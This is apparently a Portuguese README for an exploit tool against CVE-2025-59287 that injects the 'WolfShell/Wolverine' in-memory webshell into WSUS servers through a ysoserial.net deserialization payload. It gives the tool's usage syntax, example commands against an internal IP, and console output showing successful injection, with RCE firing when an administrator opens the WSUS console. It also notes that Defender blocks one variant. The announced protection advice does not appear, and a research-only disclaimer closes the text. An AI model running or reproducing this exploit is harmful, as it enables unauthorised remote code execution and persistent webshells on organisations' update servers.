
Exploit para CVE-2025-59287, injetando webshell de memória WolfShell em servidores WSUS para alcançar execução remota de código quando o console administrativo é aberto.
CVE-2025-59287 — Injeção do WolfShell Wolverine como memory shell direto (forward)
A CVE-2025-59287 explora uma falha lógica nos componentes relacionados ao WSUS para injetar o memory shell WolfShell no servidor de destino. Quando um administrador abre o console do WSUS (acionado aleatoriamente em 1 a 30 minutos por padrão), o memory shell é acionado e resulta em execução remota de código (RCE). Este documento contém exemplos de exploração, arquivos necessários e recomendações de proteção.
Envie um payload de desserialização do ysoserial.net para o servidor de destino, com funcionalidade personalizada. Este projeto demonstra a injeção do memory shell Wolverine.
Usage: CVE-2025-59287 <target_url> <payload_file>
CVE-2025-59287 http://192.168.50.159:8530 wolfaspx.txt
C:\Users\Administrator\Desktop\>CVE-2025-59287 http://192.168.50.159:8530 wolfshell.txt
[+] Target: http://192.168.50.159:8530/
[+] Payload read successfully, length: 20413 characters
[+] Getting Server ID...
[+] Server ID: c37d5d65-6460-4543-b7f2-f6414a3c36f9
[+] Auth cookie with Server ID...
[+] Using ID: c37d5d65-6460-4543-b7f2-f6414a3c36f9
[+] Sending event with payload...
[+] SUCCESS!
[!] RCE will trigger when you open the WSUS console!
[!] to cleanup remove the hawktrace.local computer from WSUS
CVE-2025-59287 http://192.168.50.159:8530 allow7556.txt

O Defender do Win2019 bloqueia e elimina, impossível de usar

Como mostrado na imagem, a escuta bem-sucedida na porta 7556 indica que o memory shell direto (forward) do Wolverine foi injetado


Este documento é destinado exclusivamente a fins de pesquisa de segurança e proteção. Não use o código de exploração relacionado em sistemas não autorizados ou atividades de ataque.